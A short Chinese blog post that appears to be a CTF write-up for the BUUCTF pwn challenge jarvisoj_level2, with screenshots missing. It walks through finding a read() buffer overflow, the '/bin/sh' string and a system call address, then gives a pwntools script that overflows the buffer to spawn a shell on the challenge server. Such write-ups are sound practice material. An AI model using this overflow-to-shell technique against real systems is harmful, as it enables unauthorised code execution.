BUUCTF-PWN-jarvisoj_level2

76次阅读
没有评论

共计 240 个字符,预计需要花费 1 分钟才能阅读完成。

提醒:本文最后更新于 2024-08-29 10:10,文中所关联的信息可能已发生改变,请知悉!

checksec

BUUCTF-PWN-jarvisoj_level2

IDA

BUUCTF-PWN-jarvisoj_level2

BUUCTF-PWN-jarvisoj_level2

read是一个溢出点

查看字符串,发现有binsh

BUUCTF-PWN-jarvisoj_level2

找到 binsh 地址

BUUCTF-PWN-jarvisoj_level2

再找到 systemtext段的地址

BUUCTF-PWN-jarvisoj_level2

EXP

from pwn import *

p = remote('node4.buuoj.cn', 29211)

payload = b'a' * (0x88 + 0x4) + p32(0x804845C) + p32(0x804A024)
p.sendlineafter('\n', payload)

p.interactive()

结果

BUUCTF-PWN-jarvisoj_level2

正文完
 0
icvuln
版权声明:本站原创文章,由 icvuln 于2021-11-14发表,共计240字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)